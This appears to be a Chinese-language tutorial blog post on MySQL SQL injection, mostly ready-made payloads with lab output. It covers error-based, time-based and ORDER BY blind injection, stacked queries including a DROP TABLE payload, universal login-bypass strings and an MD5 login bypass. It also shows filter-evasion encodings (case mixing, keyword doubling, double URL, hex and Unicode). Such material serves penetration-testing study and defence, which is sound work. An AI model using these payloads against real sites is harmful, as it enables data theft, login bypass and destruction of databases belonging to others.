<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">Select</span> <span class="mi">1</span><span class="p">,</span><span class="k">count</span><span class="p">(</span><span class="o">*</span><span class="p">),</span><span class="n">concat</span><span class="p">(</span><span class="mi">0</span><span class="n">x3a</span><span class="p">,</span><span class="mi">0</span><span class="n">x3a</span><span class="p">,(</span><span class="k">select</span> <span class="k">user</span><span class="p">()),</span><span class="mi">0</span><span class="n">x3a</span><span class="p">,</span><span class="mi">0</span><span class="n">x3a</span><span class="p">,</span><span class="n">floor</span><span class="p">(</span><span class="n">rand</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span><span class="o">*</span><span class="mi">2</span><span class="p">))</span><span class="n">a</span> <span class="k">from</span> <span class="n">information_schema</span><span class="p">.</span><span class="n">columns</span> <span class="k">group</span> <span class="k">by</span> <span class="n">a</span><span class="p">;</span> 
</code></pre></div></div>

<p>这个和正则差不多</p>

<h4 id="基于时间">基于时间</h4>
<p>if判断语句，条件为假，执行sleep</p>
<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">If</span><span class="p">(</span><span class="n">ascii</span><span class="p">(</span><span class="n">substr</span><span class="p">(</span><span class="k">database</span><span class="p">(),</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">))</span><span class="o">&gt;</span><span class="mi">115</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="n">sleep</span><span class="p">(</span><span class="mi">5</span><span class="p">))</span><span class="o">%</span><span class="mi">23</span> 
</code></pre></div></div>
<p>原理大多类似,要求网速比较好</p>

<h4 id="基于报错">基于报错</h4>
<p>得到表名：</p>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">select</span> <span class="n">exp</span><span class="p">(</span><span class="o">~</span><span class="p">(</span><span class="k">select</span><span class="o">*</span><span class="k">from</span><span class="p">(</span><span class="k">select</span> <span class="k">table_name</span> <span class="k">from</span> <span class="n">information_schema</span><span class="p">.</span><span class="n">tables</span> <span class="k">where</span> <span class="n">table_schema</span><span class="o">=</span><span class="k">database</span><span class="p">()</span> <span class="k">limit</span> <span class="mi">0</span><span class="p">,</span><span class="mi">1</span><span class="p">)</span><span class="n">x</span><span class="p">));</span>
</code></pre></div></div>
<p>当数字大于BIGINT溢出后mysql会报错, 这里的BIGINT是 !0</p>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">MariaDB</span> <span class="p">[(</span><span class="k">none</span><span class="p">)]</span><span class="o">&gt;</span> <span class="k">select</span> <span class="o">~</span><span class="mi">0</span><span class="p">;</span>
<span class="o">+</span><span class="c1">----------------------+</span>
<span class="o">|</span> <span class="o">~</span><span class="mi">0</span>                   <span class="o">|</span>
<span class="o">+</span><span class="c1">----------------------+</span>
<span class="o">|</span> <span class="mi">18446744073709551615</span> <span class="o">|</span>
<span class="o">+</span><span class="c1">----------------------+</span>
<span class="mi">1</span> <span class="k">row</span> <span class="k">in</span> <span class="k">set</span> <span class="p">(</span><span class="mi">0</span><span class="p">.</span><span class="mi">000</span> <span class="n">sec</span><span class="p">)</span>
</code></pre></div></div>

<p>然后实验如下:</p>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">MariaDB</span> <span class="p">[(</span><span class="k">none</span><span class="p">)]</span><span class="o">&gt;</span> <span class="k">select</span> <span class="p">(</span><span class="k">select</span><span class="o">*</span><span class="k">from</span><span class="p">(</span><span class="k">select</span> <span class="k">user</span><span class="p">())</span><span class="n">x</span><span class="p">);</span>
<span class="o">+</span><span class="c1">-------------------------------+</span>
<span class="o">|</span> <span class="p">(</span><span class="k">select</span><span class="o">*</span><span class="k">from</span><span class="p">(</span><span class="k">select</span> <span class="k">user</span><span class="p">())</span><span class="n">x</span><span class="p">)</span> <span class="o">|</span>
<span class="o">+</span><span class="c1">-------------------------------+</span>
<span class="o">|</span> <span class="n">root</span><span class="o">@</span><span class="n">localhost</span>                <span class="o">|</span>
<span class="o">+</span><span class="c1">-------------------------------+</span>
<span class="mi">1</span> <span class="k">row</span> <span class="k">in</span> <span class="k">set</span> <span class="p">(</span><span class="mi">0</span><span class="p">.</span><span class="mi">006</span> <span class="n">sec</span><span class="p">)</span>

<span class="n">MariaDB</span> <span class="p">[(</span><span class="k">none</span><span class="p">)]</span><span class="o">&gt;</span> <span class="k">select</span> <span class="o">!</span><span class="p">(</span><span class="k">select</span><span class="o">*</span><span class="k">from</span><span class="p">(</span><span class="k">select</span> <span class="k">user</span><span class="p">())</span><span class="n">x</span><span class="p">);</span>
<span class="o">+</span><span class="c1">--------------------------------+</span>
<span class="o">|</span> <span class="o">!</span><span class="p">(</span><span class="k">select</span><span class="o">*</span><span class="k">from</span><span class="p">(</span><span class="k">select</span> <span class="k">user</span><span class="p">())</span><span class="n">x</span><span class="p">)</span> <span class="o">|</span>
<span class="o">+</span><span class="c1">--------------------------------+</span>
<span class="o">|</span>                              <span class="mi">1</span> <span class="o">|</span>
<span class="o">+</span><span class="c1">--------------------------------+</span>
<span class="mi">1</span> <span class="k">row</span> <span class="k">in</span> <span class="k">set</span><span class="p">,</span> <span class="mi">1</span> <span class="n">warning</span> <span class="p">(</span><span class="mi">0</span><span class="p">.</span><span class="mi">001</span> <span class="n">sec</span><span class="p">)</span>
</code></pre></div></div>

<p>因此,只要我们触发溢出错误即可,但是这种方式只适用于较低版本的mysql
我的MariaDB做了相关保护:</p>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">MariaDB</span> <span class="p">[(</span><span class="k">none</span><span class="p">)]</span><span class="o">&gt;</span> <span class="k">select</span> <span class="o">!</span><span class="p">(</span><span class="k">select</span><span class="o">*</span><span class="k">from</span><span class="p">(</span><span class="k">select</span> <span class="k">user</span><span class="p">())</span><span class="n">x</span><span class="p">)</span> <span class="o">-</span> <span class="o">~</span><span class="mi">0</span><span class="p">;</span>
<span class="n">ERROR</span> <span class="mi">1690</span> <span class="p">(</span><span class="mi">22003</span><span class="p">):</span> <span class="nb">BIGINT</span> <span class="nb">UNSIGNED</span> <span class="n">value</span> <span class="k">is</span> <span class="k">out</span> <span class="k">of</span> <span class="k">range</span> <span class="k">in</span> <span class="s1">'!(select #) - ~0'</span>
</code></pre></div></div>

<p>期望的内容被 ‘#’ 代替了.同理,在insert update语句中也可构造溢出:</p>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">insert</span> <span class="k">into</span> <span class="n">users</span> <span class="p">(</span><span class="n">id</span><span class="p">,</span> <span class="n">username</span><span class="p">,</span> <span class="n">password</span><span class="p">)</span> <span class="k">values</span> <span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="s1">''</span> <span class="k">or</span> <span class="o">!</span><span class="p">(</span><span class="k">select</span><span class="o">*</span><span class="k">from</span><span class="p">(</span><span class="k">select</span> <span class="k">user</span><span class="p">())</span><span class="n">x</span><span class="p">)</span><span class="o">-~</span><span class="mi">0</span> <span class="k">or</span> <span class="s1">''</span><span class="p">,</span> <span class="s1">'Eyre'</span><span class="p">);</span>

<span class="k">update</span> <span class="n">users</span> <span class="k">set</span> <span class="n">password</span><span class="o">=</span><span class="s1">'Peter'</span> <span class="k">or</span> <span class="o">!</span><span class="p">(</span><span class="k">select</span><span class="o">*</span><span class="k">from</span><span class="p">(</span><span class="k">select</span> <span class="k">user</span><span class="p">())</span><span class="n">x</span><span class="p">)</span><span class="o">-~</span><span class="mi">0</span> <span class="k">or</span> <span class="s1">''</span> <span class="k">where</span> <span class="n">id</span><span class="o">=</span><span class="mi">4</span><span class="p">;</span>
</code></pre></div></div>

<p>参考文章:
<a href="http://www.vuln.cn/6818">BIGINT</a>
<a href="https://www.cnblogs.com/lcamry/p/5763129.html">Blind Inject</a></p>

<ol>
  <li>order by注入
    <ul>
      <li>盲注</li>
      <li>触发报错</li>
    </ul>
  </li>
</ol>

<p>  其实原理与上面类似, 首先熟悉一下order by, 他是mysql中对查询数据进行排序的方法,使用示例:</p>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">select</span> <span class="o">*</span> <span class="k">from</span> <span class="err">表名</span> <span class="k">order</span> <span class="k">by</span> <span class="err">列名</span><span class="p">(</span><span class="err">或者数字</span><span class="p">)</span> <span class="k">asc</span><span class="err">；升序</span><span class="p">(</span><span class="err">默认升序</span><span class="p">)</span>
<span class="k">select</span> <span class="o">*</span> <span class="k">from</span> <span class="err">表名</span> <span class="k">order</span> <span class="k">by</span> <span class="err">列名</span><span class="p">(</span><span class="err">或者数字</span><span class="p">)</span> <span class="k">desc</span><span class="err">；降序</span>
</code></pre></div></div>

<p>  这里的重点在于order by后既可以填列名或者是一个数字。举个例子： id是user表的第一列的列名，那么如果想根据id来排序，有两种写:</p>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">select</span> <span class="o">*</span> <span class="k">from</span> <span class="k">user</span> <span class="k">order</span> <span class="k">by</span> <span class="n">id</span><span class="p">;</span>
<span class="n">selecr</span> <span class="o">*</span> <span class="k">from</span> <span class="k">user</span> <span class="k">order</span> <span class="k">by</span> <span class="mi">1</span><span class="p">;</span>
</code></pre></div></div>

<h6 id="union盲注">Union盲注</h6>
<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$sql</span> <span class="o">=</span> <span class="s1">'select * from admin where username='</span><span class="s2">".</span><span class="nv">$username</span><span class="s2">."</span><span class="s1">''</span><span class="p">;</span>
<span class="nv">$result</span> <span class="o">=</span> <span class="nb">mysql_query</span><span class="p">(</span><span class="nv">$sql</span><span class="p">);</span>
<span class="nv">$row</span> <span class="o">=</span> <span class="nb">mysql_fetch_array</span><span class="p">(</span><span class="nv">$result</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$row</span><span class="p">)</span><span class="o">&amp;&amp;</span><span class="n">row</span><span class="p">[</span><span class="s1">'username'</span><span class="p">]</span><span class="o">!=</span><span class="s2">"admin"</span><span class="p">){</span>
	<span class="nv">$hit</span><span class="o">=</span><span class="s2">"username error!"</span><span class="p">;</span>
<span class="p">}</span><span class="k">else</span><span class="p">{</span>
	<span class="k">if</span> <span class="p">(</span><span class="nv">$row</span><span class="p">[</span><span class="s1">'password'</span><span class="p">]</span> <span class="o">===</span> <span class="nv">$password</span><span class="p">){</span>
		<span class="nv">$hit</span><span class="o">=</span><span class="s2">""</span><span class="p">;</span>
	<span class="p">}</span><span class="k">else</span><span class="p">{</span>
		<span class="nv">$hit</span><span class="o">=</span><span class="s2">"password error!"</span><span class="p">;</span>
	<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<p>payload</p>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">username</span><span class="o">=</span><span class="k">admin</span><span class="s1">' union 1,2,'</span><span class="err">字符串</span><span class="s1">' order by 3	//'</span>
</code></pre></div></div>

<p>此时sql语句变为:</p>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">select</span> <span class="o">*</span> <span class="k">from</span> <span class="k">admin</span> <span class="k">where</span> <span class="n">username</span><span class="o">=</span><span class="s1">'admin'</span> <span class="k">or</span> <span class="mi">1</span> <span class="k">union</span> <span class="k">select</span> <span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="nb">binary</span> <span class="s1">'字符串'</span> <span class="k">order</span> <span class="k">by</span> <span class="mi">3</span><span class="p">;</span>
</code></pre></div></div>
<p>  这里就会对第三列进行比较，即将字符串和密码进行比较。然后就可以根据页面返回的不同情况进行盲注。 注意的是最好加上binary，因order by比较的时候不区分大小写。
例如:</p>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">mysql</span><span class="o">&gt;</span> <span class="k">select</span> <span class="o">*</span> <span class="k">from</span> <span class="n">order1</span><span class="p">;</span>
<span class="o">+</span><span class="c1">------+----------+----------+</span>
<span class="o">|</span> <span class="n">id</span> <span class="o">|</span> <span class="n">username</span> <span class="o">|</span> <span class="n">password</span> <span class="o">|</span>
<span class="o">+</span><span class="c1">------+----------+----------+</span>
<span class="o">|</span> <span class="mi">1</span> <span class="o">|</span> <span class="k">admin</span> <span class="o">|</span> <span class="n">uP10AcB</span> <span class="o">|</span>
<span class="o">+</span><span class="c1">------+----------+----------+</span>
<span class="n">mysql</span><span class="o">&gt;</span> <span class="k">select</span> <span class="o">*</span> <span class="k">from</span> <span class="n">order1</span> <span class="k">where</span> <span class="n">username</span><span class="o">=</span><span class="s1">''</span> <span class="k">or</span> <span class="mi">1</span> <span class="k">union</span> <span class="k">select</span> <span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="s1">'v'</span> <span class="k">order</span> <span class="k">by</span> <span class="mi">3</span><span class="p">;</span>
<span class="o">+</span><span class="c1">------+----------+----------+</span>
<span class="o">|</span> <span class="n">id</span> <span class="o">|</span> <span class="n">username</span> <span class="o">|</span> <span class="n">password</span> <span class="o">|</span>
<span class="o">+</span><span class="c1">------+----------+----------+</span>
<span class="o">|</span> <span class="mi">1</span> <span class="o">|</span> <span class="k">admin</span> <span class="o">|</span> <span class="n">uP10AcB</span> <span class="o">|</span>
<span class="o">|</span> <span class="mi">1</span> <span class="o">|</span> <span class="mi">2</span> <span class="o">|</span> <span class="n">v</span> <span class="o">|</span>
<span class="o">+</span><span class="c1">------+----------+----------+</span>


<span class="n">mysql</span><span class="o">&gt;</span> <span class="k">select</span> <span class="o">*</span> <span class="k">from</span> <span class="n">order1</span> <span class="k">where</span> <span class="n">username</span><span class="o">=</span><span class="s1">''</span> <span class="k">or</span> <span class="mi">1</span> <span class="k">union</span> <span class="k">select</span> <span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="s1">'a'</span> <span class="k">order</span> <span class="k">by</span> <span class="mi">3</span><span class="p">;</span>
<span class="o">+</span><span class="c1">------+----------+----------+</span>
<span class="o">|</span> <span class="n">id</span> <span class="o">|</span> <span class="n">username</span> <span class="o">|</span> <span class="n">password</span> <span class="o">|</span>
<span class="o">+</span><span class="c1">------+----------+----------+</span>
<span class="o">|</span> <span class="mi">1</span> <span class="o">|</span> <span class="mi">2</span> <span class="o">|</span> <span class="n">a</span> <span class="o">|</span>
<span class="o">|</span> <span class="mi">1</span> <span class="o">|</span> <span class="k">admin</span> <span class="o">|</span> <span class="n">uP10AcB</span> <span class="o">|</span>
<span class="o">+</span><span class="c1">------+----------+----------+</span>

<span class="n">mysql</span><span class="o">&gt;</span> <span class="k">select</span> <span class="o">*</span> <span class="k">from</span> <span class="n">order1</span> <span class="k">where</span> <span class="n">username</span><span class="o">=</span><span class="s1">''</span> <span class="k">or</span> <span class="mi">1</span> <span class="k">union</span> <span class="k">select</span> <span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="s1">'u'</span> <span class="k">order</span> <span class="k">by</span> <span class="mi">3</span><span class="p">;</span>
<span class="o">+</span><span class="c1">------+----------+----------+</span>
<span class="o">|</span> <span class="n">id</span> <span class="o">|</span> <span class="n">username</span> <span class="o">|</span> <span class="n">password</span> <span class="o">|</span>
<span class="o">+</span><span class="c1">------+----------+----------+</span>
<span class="o">|</span> <span class="mi">1</span> <span class="o">|</span> <span class="mi">2</span> <span class="o">|</span> <span class="n">u</span> <span class="o">|</span>
<span class="o">|</span> <span class="mi">1</span> <span class="o">|</span> <span class="k">admin</span> <span class="o">|</span> <span class="n">uP10AcB</span> <span class="o">|</span>
<span class="o">+</span><span class="c1">------+----------+----------+</span>
</code></pre></div></div>
<p>  这里的order by 3是根据第三列进行排序，如果我们union查询的字符串比password小的话，我们构造的 1,2,a就会成为第一列，那么在源码对用户名做对比的时候，就会返回username error!，如果union查询的字符串比password大，那么正确的数据就会是第一列，那么页面就会返回password error!.</p>

<h5 id="基于if盲注">基于if()盲注</h5>
<p><strong>需要知道列名的情况:</strong>
  order by的列不同，返回的页面当然也是不同的，所以就可以根据排序的列不同来盲注。</p>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">order</span> <span class="k">by</span> <span class="n">if</span><span class="p">(</span><span class="mi">1</span><span class="o">=</span><span class="mi">1</span><span class="p">,</span><span class="n">id</span><span class="p">,</span><span class="n">username</span><span class="p">);</span>
</code></pre></div></div>

<p>  这里如果使用数字代替列名是不行的，因为if语句返回的是<strong>字符类型</strong>,不是整型.</p>

<p><strong>不必知道列名:</strong>
payload:</p>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">order</span> <span class="k">by</span> <span class="n">if</span><span class="p">(</span><span class="err">表达式</span><span class="p">,</span><span class="mi">1</span><span class="p">,(</span><span class="k">select</span> <span class="n">id</span> <span class="k">from</span> <span class="n">information_schema</span><span class="p">.</span><span class="n">tables</span><span class="p">))</span>
</code></pre></div></div>

<p>  如果表达式为false时，sql语句会报ERROR 1242 (21000): Subquery returns more than 1 row的错误，导致查询内容为空，如果表达式为true是，则会返回正常的页面。</p>

<h6 id="基于时间-1">基于时间</h6>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">order</span> <span class="k">by</span> <span class="n">if</span><span class="p">(</span><span class="mi">1</span><span class="o">=</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">,</span><span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">))</span>
</code></pre></div></div>
<p>测试:</p>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">select</span> <span class="o">*</span> <span class="k">from</span> <span class="n">ha</span> <span class="k">order</span> <span class="k">by</span> <span class="n">if</span><span class="p">(</span><span class="mi">1</span><span class="o">=</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">,</span><span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">));</span> <span class="o">#</span><span class="err">正常时间</span>
<span class="k">select</span> <span class="o">*</span> <span class="k">from</span> <span class="n">ha</span> <span class="k">order</span> <span class="k">by</span> <span class="n">if</span><span class="p">(</span><span class="mi">1</span><span class="o">=</span><span class="mi">2</span><span class="p">,</span><span class="mi">1</span><span class="p">,</span><span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">));</span> <span class="o">#</span><span class="err">有延迟</span>
</code></pre></div></div>

<p>  测试的时候发现延迟的时间并不是sleep(1)中的1秒，而是大于1秒。 最后发现延迟的时间和所查询的数据的条数是成倍数关系的.计算公式:</p>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="err">延迟时间</span><span class="o">=</span><span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span><span class="err">的秒数</span><span class="o">*</span><span class="err">所查询数据条数</span>
</code></pre></div></div>

<p>  我所测试的表中有四条数据,所以延迟了4秒。如果查询的数据很多时，延迟的时间就会很长了。 在写脚本时，可以添加timeout这一参数来避免延迟时间过长这一情况。</p>

<h6 id="基于rand的盲注">基于rand()的盲注</h6>

<p>原理与上面类似,看例子:</p>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">mysql</span><span class="o">&gt;</span> <span class="k">select</span> <span class="o">*</span> <span class="k">from</span> <span class="n">ha</span> <span class="k">order</span> <span class="k">by</span> <span class="n">rand</span><span class="p">(</span><span class="k">true</span><span class="p">);</span>
<span class="o">+</span><span class="c1">----+------+</span>
<span class="o">|</span> <span class="n">id</span> <span class="o">|</span> <span class="n">name</span> <span class="o">|</span>
<span class="o">+</span><span class="c1">----+------+</span>
<span class="o">|</span>  <span class="mi">9</span> <span class="o">|</span> <span class="k">NULL</span> <span class="o">|</span>
<span class="o">|</span>  <span class="mi">6</span> <span class="o">|</span> <span class="k">NULL</span> <span class="o">|</span>
<span class="o">|</span>  <span class="mi">5</span> <span class="o">|</span> <span class="k">NULL</span> <span class="o">|</span>
<span class="o">|</span>  <span class="mi">1</span> <span class="o">|</span> <span class="n">dss</span>  <span class="o">|</span>
<span class="o">|</span>  <span class="mi">0</span> <span class="o">|</span> <span class="n">dasd</span> <span class="o">|</span>
<span class="o">+</span><span class="c1">----+------+</span>
<span class="n">mysql</span><span class="o">&gt;</span> <span class="k">select</span> <span class="o">*</span> <span class="k">from</span> <span class="n">ha</span> <span class="k">order</span> <span class="k">by</span> <span class="n">rand</span><span class="p">(</span><span class="k">false</span><span class="p">);</span>
<span class="o">+</span><span class="c1">----+------+</span>
<span class="o">|</span> <span class="n">id</span> <span class="o">|</span> <span class="n">name</span> <span class="o">|</span>
<span class="o">+</span><span class="c1">----+------+</span>
<span class="o">|</span>  <span class="mi">1</span> <span class="o">|</span> <span class="n">dss</span>  <span class="o">|</span>
<span class="o">|</span>  <span class="mi">6</span> <span class="o">|</span> <span class="k">NULL</span> <span class="o">|</span>
<span class="o">|</span>  <span class="mi">0</span> <span class="o">|</span> <span class="n">dasd</span> <span class="o">|</span>
<span class="o">|</span>  <span class="mi">5</span> <span class="o">|</span> <span class="k">NULL</span> <span class="o">|</span>
<span class="o">|</span>  <span class="mi">9</span> <span class="o">|</span> <span class="k">NULL</span> <span class="o">|</span>
<span class="o">+</span><span class="c1">----+------+</span>
</code></pre></div></div>

<p>可以看到当rand()为true和false时，排序结果是不同的，所以就可以使用rand()函数构造表达式进行盲注了.</p>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">order</span> <span class="k">by</span> <span class="n">rand</span><span class="p">(</span><span class="n">ascii</span><span class="p">(</span><span class="n">mid</span><span class="p">((</span><span class="k">select</span> <span class="k">database</span><span class="p">()),</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">))</span><span class="o">&gt;</span><span class="mi">96</span><span class="p">)</span>
</code></pre></div></div>

<h6 id="基于报错-1">基于报错</h6>

<p><em>updatexml</em></p>
<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">select</span> <span class="o">*</span> <span class="k">from</span> <span class="n">ha</span> <span class="k">order</span> <span class="k">by</span> <span class="n">updatexml</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="n">if</span><span class="p">(</span><span class="mi">1</span><span class="o">=</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">,</span><span class="k">user</span><span class="p">()),</span><span class="mi">1</span><span class="p">);</span><span class="o">#</span><span class="err">查询正常</span>
<span class="k">select</span> <span class="o">*</span> <span class="k">from</span> <span class="n">ha</span> <span class="k">order</span> <span class="k">by</span> <span class="n">updatexml</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="n">if</span><span class="p">(</span><span class="mi">1</span><span class="o">=</span><span class="mi">2</span><span class="p">,</span><span class="mi">1</span><span class="p">,</span><span class="k">user</span><span class="p">()),</span><span class="mi">1</span><span class="p">);</span><span class="o">#</span><span class="err">查询报错</span>
</code></pre></div></div>

<p><em>extractvalue</em></p>
<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">select</span> <span class="o">*</span> <span class="k">from</span> <span class="n">ha</span> <span class="k">order</span> <span class="k">by</span> <span class="n">extractvalue</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="n">if</span><span class="p">(</span><span class="mi">1</span><span class="o">=</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">,</span><span class="k">user</span><span class="p">()));</span><span class="o">#</span><span class="err">查询正常</span>
<span class="k">select</span> <span class="o">*</span> <span class="k">from</span> <span class="n">ha</span> <span class="k">order</span> <span class="k">by</span> <span class="n">extractvalue</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="n">if</span><span class="p">(</span><span class="mi">1</span><span class="o">=</span><span class="mi">2</span><span class="p">,</span><span class="mi">1</span><span class="p">,</span><span class="k">user</span><span class="p">()));</span><span class="o">#</span><span class="err">查询报错</span>
</code></pre></div></div>

<ol>
  <li>堆叠注入(Stacking Queries)</li>
</ol>

<p>一句代码之中执行多个查询语句，这在每一个注入点都非常有用，尤其是使用SQL Server后端的应用</p>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">;</span> <span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">members</span><span class="p">;</span> <span class="k">DROP</span> <span class="n">members</span> <span class="c1">--</span>
</code></pre></div></div>

<p>支持堆叠查询的语言/数据库
绿色：支持，暗灰色：不支持，浅灰色：未知
<img src="http://drops.xmd5.com/full/7eba77f1e9332de0158f5a1ae5de6ca3a1526df1.jpg" alt="堆叠注入情况" /></p>

<ol>
  <li>
    <p>万能密码</p>

    <ul>
      <li>admin’ –   #’</li>
      <li>admin’ #    #’</li>
      <li>admin’/*	  #’</li>
      <li>’ or 1=1–  #’</li>
      <li>’ or 1=1#   #’</li>
      <li>’ or 1=1/*  #’</li>
      <li>’) or ‘1’=’1–	#’</li>
      <li>’) or (‘1’=’1–	#’</li>
    </ul>
  </li>
</ol>

<h6 id="绕过检查md5哈希的登陆界面">绕过检查MD5哈希的登陆界面</h6>

<p>  如果应用是先通过用户名，读取密码的MD5，然后和你提供的密码的MD5进行比较，那么你就需要一些额外的技巧才能绕过验证。你可以把个已知明文的MD5哈希和它的明文一起提交，使得程序不使用从数据库中读取的哈希，而使用你提供的哈希进行比较。
绕过MD5哈希检查的例子(MSP)</p>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="err">用户名：</span><span class="k">admin</span>

<span class="err">密码：</span><span class="mi">1234</span> <span class="s1">' AND 1=0 UNION ALL SELECT '</span><span class="k">admin</span><span class="s1">','</span><span class="mi">81</span><span class="n">dc9bdb52d04dc20036dbd8313ed055</span>
<span class="o">//</span> <span class="err">其中</span><span class="mi">81</span><span class="n">dc9bdb52d04dc20036dbd8313ed055</span> <span class="o">=</span> <span class="n">MD5</span><span class="p">(</span><span class="mi">1234</span><span class="p">)</span>
</code></pre></div></div>

<ol>
  <li>
    <p>一些Bypass</p>

    <ol>
      <li>大小写混合
 大小写绕过用于只针对小写或大写的关键字匹配技术，正则表达式/express/i 大小写不敏感即无法绕过，这是最简单的绕过技术</li>
    </ol>

    <p>举例：z.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4</p>

    <p>示例场景可能的情况为filter的规则里有对大小写转换的处理，但不是每个关键字或每种情况都有处理</p>

    <ol>
      <li>替换关键字
 这种情况下大小写转化无法绕过，而且正则表达式会替换或删除select、union这些关键字，如果只匹配一次就很容易绕过</li>
    </ol>

    <p>举例：z.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4</p>

    <p>同样是很基础的技术，有些时候甚至构造得更复杂：SeLSeselectleCTecT，不建议对此抱太大期望</p>

    <ol>
      <li>使用编码
        <ul>
          <li>URL编码</li>
        </ul>
      </li>
    </ol>

    <p>  在Chrome中输入一个连接，非保留字的字符浏览器会对其URL编码，如空格变为%20、单引号%27、左括号%28、右括号%29
 普通的URL编码可能无法实现绕过，还存在一种情况URL编码只进行了一次过滤，可以用两次编码绕过：</p>
  </li>
</ol>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">page</span><span class="p">.</span><span class="n">php</span><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="o">%</span><span class="mi">252</span><span class="n">f</span><span class="o">%</span><span class="mi">252</span><span class="n">a</span><span class="o">*/</span><span class="k">UNION</span><span class="o">%</span><span class="mi">252</span><span class="n">f</span><span class="o">%</span><span class="mi">252</span><span class="n">a</span> <span class="o">/</span><span class="k">SELECT</span> <span class="o">#</span>
</code></pre></div></div>

<ul>
  <li>十六进制编码</li>
</ul>

<p>举例：</p>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">z</span><span class="p">.</span><span class="n">com</span><span class="o">/</span><span class="k">index</span><span class="p">.</span><span class="n">php</span><span class="o">?</span><span class="n">page_id</span><span class="o">=-</span><span class="mi">15</span> <span class="cm">/*!u%6eion*/</span> <span class="cm">/*!se%6cect*/</span> <span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span>
<span class="k">SELECT</span><span class="p">(</span><span class="n">extractvalue</span><span class="p">(</span><span class="mi">0</span><span class="n">x3C613E61646D696E3C2F613E</span><span class="p">,</span><span class="mi">0</span><span class="n">x2f61</span><span class="p">))</span>
</code></pre></div></div>

<p>  示例代码中，前者是对单个字符十六进制编码，后者则是对整个字符串编码，使用上来说较少见一点</p>

<ul>
  <li>Unicode编码</li>
</ul>

<p>  Unicode有所谓的标准编码和非标准编码，假设我们用的utf-8为标准编码，那么西欧语系所使用的就是非标准编码了</p>

<p>  看一下常用的几个符号的一些Unicode编码：</p>

<p>单引号: <code class="language-plaintext highlighter-rouge">%u0027、%u02b9、%u02bc、%u02c8、%u2032、%uff07、%c0%27、%c0%a7、%e0%80%a7</code></p>

<p>空格: <code class="language-plaintext highlighter-rouge">%u0020、%uff00、%c0%20、%c0%a0、%e0%80%a0</code></p>

<p>左括号: <code class="language-plaintext highlighter-rouge">%u0028、%uff08、%c0%28、%c0%a8、%e0%80%a8</code></p>

<p>右括号: <code class="language-plaintext highlighter-rouge">%u0029、%uff09、%c0%29、%c0%a9、%e0%80%a9</code></p>

<p>举例: <code class="language-plaintext highlighter-rouge">?id=10%D6'%20AND%201=2%23</code>　　#’</p>

